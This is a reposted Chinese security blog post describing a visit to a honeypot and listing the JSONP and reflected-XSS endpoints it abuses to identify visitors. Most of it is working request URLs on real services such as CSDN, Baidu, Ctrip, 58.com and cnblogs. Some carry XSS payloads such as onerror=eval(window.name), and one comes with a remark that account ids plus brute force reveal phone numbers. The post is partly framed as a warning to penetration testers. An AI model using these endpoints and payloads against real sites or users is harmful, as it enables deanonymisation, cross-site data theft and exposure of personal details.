蜜罐接口抓取分享

渗透技巧 2年前 (2022) admin
868 0 0


水篇文章吧 分享一些接口玩

前言:事情是这样的 和以前一样正常打开土司逛论坛

发觉到一篇关于踩了京东蜜罐的文章

蜜罐接口抓取分享

就跟着这个师傅的文章泄露的关键点

某物流-

物控平台-登录

结合起来去fofa搜下就能找到了

蜜罐接口抓取分享


然后淡定的打开隐私模式进行访问这个 进行踩蜜罐抓一波接口


还是逮到蛮多接口的 踩到这个蜜罐的话确实直接一波溯源铁铁的 地域+id+在结合某些博客以及这些平台的找回密码即可精准溯源了 原理也是蛮常规的 jsonp或者反射xss去获取数据

把相关接口分享给大家吧 还有两个某厂商的xss笑死

①58同城接口

https://employer.58.com/index/enterpriseinfo?&xxoo=chrome-extension://&&callback=jQuery152018637907672647902_1657807551290&_=1657807551747

蜜罐接口抓取分享

②城通网盘

https://home.ctfile.com/iajax.php?item=profile&xxoo=chrome-extension://&action=index&jsonp=jQuery2398423949823

蜜罐接口抓取分享

③51cto的

https://home.51cto.com/index.php?s=/Index/getLoginStatus2015/reback/http%253A%252F%252Fwww.51cto.com%252F&xxoo=chrome-extension://


蜜罐接口抓取分享

④记录ip的以及归属地的接口

https://ipip.iask.cn/iplookup/search

蜜罐接口抓取分享

⑤微博的

https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)&&callback=%3C%3E

不过没啥东西

蜜罐接口抓取分享

⑥京东的

https://api.m.jd.com/client.action?functionId=getBabelProductPaged&xxoo=chrome-extension://&body=%7b%22%73%65%63%6f%6e%64%54%61%62%49%64%22%3a%22%30%30%31%35%35%35%35%34%37%30%38%39%33%5f%30%33%37%32%36%36%30%30%5f%22%2c%22%74%79%70%65%22%3a%22%30%22%2c%22%70%61%67%65%4e%75%6d%22%3a%22%31%22%2c%22%6d%69%74%65%6d%41%64%64%72%49%64%22%3a%22%22%2c%22%67%65%6f%22%3a%7b%22%6c%6e%67%22%3a%22%22%2c%22%6c%61%74%22%3a%22%22%7d%2c%22%61%64%64%72%65%73%73%49%64%22%3a%22%22%2c%22%70%6f%73%4c%6e%67%22%3a%22%22%2c%22%70%6f%73%4c%61%74%22%3a%22%22%2c%22%66%6f%63%75%73%22%3a%22%22%2c%22%69%6e%6e%65%72%41%6e%63%68%6f%72%22%3a%22%22%7d&screen=2799*1208&client=wh5&clientVersion=1.0.0&sid=&uuid=&area=&_=1585823068850&callback=jsonp1

看了下没啥特别好的东西

蜜罐接口抓取分享

⑦爱问的

https://m.iask.sina.com.cn/cas/logins?domain=iask.sina.com.cn&xxoo=chrome-extension://&businessSys=iask&channel=null&popup=show&clsId=undefined&fid=1

蜜罐接口抓取分享

⑧百度的

https://p.qiao.baidu.com/cps5/chat/push?sid=-100&tid=-1&reason=&tid_authtype=-1&sign=&dev=0&isAFF=1&filterAdvertisement=1&AFDto=20%24548016578075084359962974541416578075084365914&AFDvw=021170454800000000000000000000000000000000000000000000008401ff8003745DDCC06B939A948AEA7288C5FD1690A%3AFG%3D10000000000000&type=2&v=165780749780958748&s=13768072&e=28181423&auth=%7B%22anonym%22%3A0%2C%22key%22%3A%22%22%2C%22sn%22%3A%22%22%2C%22id%22%3A%22165780749780958748%22%2C%22from%22%3A4%2C%22token%22%3A%22bridge%22%7D&key=%257B%2522anonym%2522%253A0%252C%2522key%2522%253A%2522%2522%252C%2522sn%2522%253A%2522%2522%252C%2522id%2522%253A%2522165780749780958748%2522%252C%2522from%2522%253A4%252C%2522token%2522%253A%2522bridge%2522%257D&v=1657807497809587484

我登录了百度账户下也没啥东西

蜜罐接口抓取分享

⑨苏宁家的

https://myjr.suning.com/sfp/mutualTrust/getLoginInfo.htm?xxoo=chrome-extension://&&callback=jQuery172011468305000873791_1608255922695&_=1657807551743

没这个的账户就没测了

蜜罐接口抓取分享


⑩csdn的

https://api.csdn.net/oauth/authorize?client_id=1000001&xxoo=chrome-extension://&redirect_uri=http://www.iteye.com/auth/csdn/callback&response_type=%22https%3A%2F%2Fapi.csdn.net%2Foauth%2Fauthorize%3Fclient_id%3D1000001%26redirect_uri%3D%22http%3A%2F%2Fwww.iteye.com%2Fauth%2Fcsdn%2Fcallback%26response_type%3D%22%3E%3Cimg%20src%3Dx%20onerror%3Deval(window.name)%3E%E3%80%81

果然还是这个接口 抓住账户id+爆破就可以得手机号了

https://api.csdn.net/oauth/authorize?client_id=1000001&xxoo=chrome-extension://&redirect_uri=http://www.iteye.com/auth/csdn/callback&response_type=”https://api.csdn.net/oauth/authorize?client_id=1000001&redirect_uri=”http://www.iteye.com/auth/csdn/callback&response_type=”><img src=x onerror=alert(1)>

蜜罐接口抓取分享

利用这个反射xss引入xss来利用的看了下思路就是

蜜罐接口抓取分享

11.超星的

POST /getauthstatus HTTP/1.1

Host: passport2.chaoxing.com


enc=80a46477866993d3599b7f39506f8ece&uuid=ddbc623b7fc14a07b4b6c8cae881f51c

蜜罐接口抓取分享


12.qq的接口

https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D&callback=%3Cimg%20src=1%20oneror=alert(1)%3E

没啥东西

蜜罐接口抓取分享


13.虎牙的接口 登录后我没看到啥东西

https://www.huya.com/udb_web/udbport2.php?m=HuyaLogin&xxoo=chrome-extension://&do=checkLogin&callback=jQuery22407402084422104858_1604891765254&callback=jQuery152018637907672647902_1657807551285&_=1657807551739

蜜罐接口抓取分享


14.博客园

https://wz.cnblogs.com/create?t=xxxx&xxoo=chrome-extension://&&u=%22%3E%3Csvg/onload=alert(%221%22)%3E&c=&i=0

且可反射xss 这个需要登录账户后

蜜罐接口抓取分享

蜜罐接口抓取分享

15.百度的接口

https://yuedu.baidu.com/nauser/getyduserinfo?na_uncheck=1&opid=wk_na&xxoo=chrome-extension://&&callback=1

这个还行 可以获取sign和userflag和uname以及图片

蜜罐接口抓取分享

16.百度的接口

看了下没啥东西

post包

https://sfp.safe.baidu.com/sfp/v1/rd


CODED–v20ezK)MoupU]_3Z)uC^)c*`X_Ga172rO8BM)KlPHO<QsytYw_xT[9b<_Ma2K?/88@bHGyRX:,QLrcmdCzrDv;]ZKla]_@h5_VIGfsfo_7W0L?Zw_FYYEc-[<e0N@gp`gZXPuf,>.UMO0YQS4]dTZum`1r4SOhEcDMj6zMn+pUs[t[vWxT[CaX_Ma1[2h`gOMjK9MoG.U]O>YQ_@^Uy8aYW<e][@ia_DMECzQIG,UMK0YQO4]US8aYW<e][@ia_DMECzQIG,UMK0YQO4_Uc8alp2g][@iE/GN1W3R-_.Y1XPZwrS^9gHfYdgncMjrwFNEjHQp_7U1zR^5>5]US8aYW<e][@ia_DMDKvMoW/QsytYaWxT[CbX_Ma1_>i5s6LDK3SHO=Qtnwe?03U[8aiW<em[Ah`C@TX;9e,zaZfe`7iCX8nh<oypNCi4CGNzylPHO8USAUvW0Y)g:]-3.ea/@e4C6dH:lSnO.UL[<ZQu4]ekDb=+<fAo@kaoGNUm8RoO<V1[<ZQS?]ekDb=+<g]gNja3FNUW)RoqpTLTsoPWEY)gCcYW.dd1u4gUIjL<


蜜罐接口抓取分享

POST /abot/api/v1/tpl/commit HTTP/1.1

Host: sofire.baidu.com


CODED–v20ezLvhHO=QsO=ZaqC]UuDbioJfAg2h`h7dDK9MoK9V]m?YQq@^ekFb=c.ddLe5;6aIT3gMS=T0C0X)T-ihJ6m05rao>uOWAL3Pzg-S+a;rspRz2jXhG],;.rcQ/DgDIkqlVHOzQsOt[vW5^e_EyY+Ifc<e5g6OjK)RYS9mMq1ZvW0Y)_*c,`MyK_p4DUaDz9eH7^00AmP?Xc88-v,Gmm@@5,4g@IkSlSnP_i`>3YvW0Y)g*c,_9f]/@e4C6NjK9MoGpTLS>Uw+xu,y5eEJ.dcOe5;6MTKvMoqpWrS2ZPW0Y)W8]-3.m^lbecx=ZYfogn,KiQT/ndcveVdZ][p5rq,5-4DcaILyfr8jL^Rgvf,,-xGl>d^K9uPhCc3;phHHMbPnwUSPTbzTjullJrqc<rOt6S3n3MLP8i`0;Xdz2YWTXf,_8a1_Ae5;6MTKvMoK.QsytYPW0Y)W;]-3.ec<e5cOIkqlQXOzQsO<Uw+x]d[4]-[Ia172ipg@IkG6Moup`CAmd40idJD`-W,c_,9,8pCd4OjXqWnU]K.YQ/vfC,6b-gNaa/Mja?4co[9QYG.TsK)URr)iC47`=_<em[@iq_EIFsgrtj<q/YaO6)S*`X_=gcQe84OdID+Sn>+kL?1mdT3,)ulhHd4h?,pW7cIO+P7TvaaUnz`)uT[4]-[La172e4C6MkGlSoK8V1[,UwW6Y)/*b=l0rpkMktoRZUOz]-[7WMq<YzX)^e)clkKf4d1i57RM)i5RY`pUrS,UwW?Y)/*],;.e1o2k4g6LDK*RnO=QrS,UwWBY)/*aX_8a1cOe5;6dX7ufr?:jrS,UwWDY)/*xlK7z4SN,4g@IkOzMoupl`?+nzGBrz[4]-c=a172uu`DbHnm]]Xwj;>/oT`*WTXf,XnyppNvuhWdHX7hH?,bPc,aR`VYWl1nmz1)5?2h`gGMjK9MsTojwW-o?d6qhk*`X_?e@cQe@qSrfYezjgnp4aSt0og24-k6X_8a1gKe5;6OEO)SLO;V1dxewc6]Cc;bYp2rpt6jakRNXPpQY_,bPO0Zd[CjUT+mh_8a1gLe5;6R3;y^7,sQNv.e4Bv[VXafX/8inOcpbs4KFHQVH+n]vPvfdG2YVzX]Yc>e][0nPh5cHjs]8SnZPv2fd?]Ac9ahXI)JRLtE_4cIPiR[>,SS,Uw[CY)/*j0l>r“>upC4VHnw^]SpTLS;YPWEY)S*`X_GelcQe4g@IkS*MoupUMS1Yaq4^UgCcYW<e][@ia_DMECzQIG,UMK0YQO4]US8aYW<e][@ia_DMECzQIG,UMK0YQO4]USGbYW=r4sOia_GN)O6VYW:VsTOY=_A^A_Fbi0eIkPm5wPRkK3SJW.Zs[3[xhW`eW8aYW<e][@ia_DMECzMn+pVMWt[vW5]z[4]-gGa172ipRFNTKvMoW8QsytYag@^9y8b=kHfAc@i`g@IkS5MoupUL/0Uv3x^Uu*c,_=d]_<ipg@IkS7MoupZ;`um?F0])S9aYW=e]_<h`Dmb4rsfL,oTN?wpUyiiT-`[z5z1gBhakRLDKvMo[,QsytoPC5qhX7`0`-yplLh8lCbTKvMo[-QsytUv3x^e[*c,_?e]OiqsDIjylRYWpWrS0Uv3x^eg*c,_<d][<i`g@IkW5MoupULS,UwcBY)/*ah;<d][<i`CDLEClPHO8WLSAUv3xT[EaX_Ma1[2h`gQMTK9MoGpTLS=YvWEY)S*`X_Ie@cQe5_6LDK5RXO=QsKtXPWB]T[I]-_<em/Aia_EMECzQIG,Qr/tZ5Sx_z[9`YW8e?@ha_@MDyzMn+pV1[t[zhwrY`-`X_JflcQv8d@c3WvMoi9Qszxed47jd7*b=y.g4t1,el9LDK6SHO=bvP,o?c0Y)uH]-42qp@CvpC6OEClSr`ojQXwXPWC]d[In08)Ko<e53FIkrp],/b/t[Q[x_,l)v]d1dcOj4gUIkClPHO;V0SAfzT0sCg4]-k>elcQe70=bnTyh8Snu[rYaO2]U3zjG0:f1kRee3QNDKvMo[7USAUzC3tTT)x05z“2,ds6LDLpQ,O=Qs_.YPO,fC,6nOJ)@32h`h:NjK9hMP8b/tewT6Y)/*],;.q1`Ce5;6Ijyl]oLqQsy0XPXx]ic*c-W8a4cA+`gUMDyl]oLtQsy0XPXx]h[*c-W8a4cA-8s6OkCvMoO7aSAYP3x])d*]-3.a0?2i5p7IkqzPHO.VP[t[wO0Y)[Cnh_Me?2i5p:IkqzPHO.VPmt[wO0Y)[CuX_Me?2i5p=IkqlMn+pUs*Uw+xYz7*a-h>rqg2k4hDcnXL];rjP_tXPW6^YS*c,_.ddK-Ec6OkG5RYi;UMm<Zaq6^US4]1h?e0cQiqwPN)izR-[8WMW;Zv3xtY_;]-3<ddK-Eo6OkG5RYi;UMm<Zau7^Uu4]1h?f0cQiqwPN)izR-[8V1S;YP3xtY_F]-3<ddK-E36OkCvMsX/WSAYag@^9y8b=kHg]gKjDC6eoOlSnO,Qr/tq)[4Y)/*cX_8a4`;e5;6Ijylhr.QsytUv3xiD_*c,_=a0?2uu_6OjK4RIm,Qr/tpzcx_z[;`-W:ems2h`hFbjK9MoGpTLT3p4WEY)S*`X`?*L72k4gDIo2vMrLyQsytZa_C]T[4]0_.g0cPkaoOZki)^YK7UMrxZzdyi)+;a-[?fKkCiOh9ZEfm^rXqbs_1[TS7])_CaYc?f13BkaoENkW6Mn+plQKt[vXxqXc*`X`4a172/NC6bUHfMovi`nUz>6hT[IkFF8pd=iNC6OmvgPK+pj]nUw,qhd8v]0FHpcQsNN@XDLwRq+pWu,oXS3xrevv]-4ypl@,e8NSXDK9[66z`LT-[c3x_+4w`[;.zm_@t`gUW22vHP)U]PnUw,qhiB*`X`.ylcQe5kRRUS6RoPKU9[=Z=[B^e,XaEgLi1sLn5gOOFS*VoW/WtdSaSxT;]-3.l]dnna`EbkDWZZ7UQr/tn@_x_z/_HpnzIhNsdxCUIXd[JvLk<XMb>v@bW,^yk`;ga0PgMdecFf4U+-VaPP`ydccXClj]X]e]0;-qxccXTyio`QmPXPm)zUe-S9gih4f4dbpqxrZXNgLQ]<zyoyejgz5v-_Gn3t@q6tmWWnuU5om]PWo?r,tX03bp3*nJ@qMOeMnj+hMPpjNTenQ1uhUajN?*L7Nj7lCcGq7Z6r^ZwXeb>rccfz:e0a+n`LjE4laFe4SMT;mLB+])XCb)hfw=XY+1t5gMdjeWjR[H?QZ:`xZbz2[Dgym+Hk3:na0OQorOZp;omuPP]zT4rTK[jml^*p;BpdwGRFnTYLTql]K;ayT^j,[;u-Xjo1rje7OWldWZX=Y^,be=dQjXcHalz9o^,`v7gSQX*^MLW]wv1ZbdBr9v8n=d3i@S:kqlbdXG*f]HTWQvx_U`)j)_7`GlxzIk;rs8mdHi7f8T=OXw[Rz[d,44giWP,_cja`vboqgY`+j9S0bSPwcf+DbzlnANm4VFUXvv^r;wb`;]n?d3g,uLzY[<,“3utwRYUnpQrW/WMS3Ya_CjU+Gb-,-r`d6ja46ZkS3Mn+pa0SAUvW0Y,W*c,_.dd1+to6OjK4RIm,Qr/tezzEY)0J]0lIa172-dd;ZW;ofsXskrS,Uz@sDd7vll>a172hqc6LDLleWpWrS1ZwcB_USFbY/Jg][Pjq3RNEilPHPzb`?ypTux_)TL`X`Ia172iDRDLkG5Mn+pla[t[vWxvbOP


蜜罐接口抓取分享

https://easylearn.baidu.com/edu-web/activity/extracheck?courseId=1&xxoo=chrome-extension://&type=1&&callback=jQuery152018637907672647902_1657807551287&_=1657807551744

蜜罐接口抓取分享


17.携程的

https://accounts.ctrip.com/ssoproxy/ssoGetUserInfo?xxoo=chrome-extension://&jsonp=%3C%22?&callback=11111

蜜罐接口抓取分享


18.直播吧

https://bbs.zhibo8.cc/user/userinfo?device=pc&xxoo=chrome-extension://&_=1657807551741&callback=%3C1

没这个的账户

蜜罐接口抓取分享

最后:渗透需小心 不然蜜罐麻麻的


原文始发于微信公众号(goddemon的小屋):蜜罐接口抓取分享

版权声明:admin 发表于 2022年7月14日 下午11:53。
转载请注明:蜜罐接口抓取分享 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...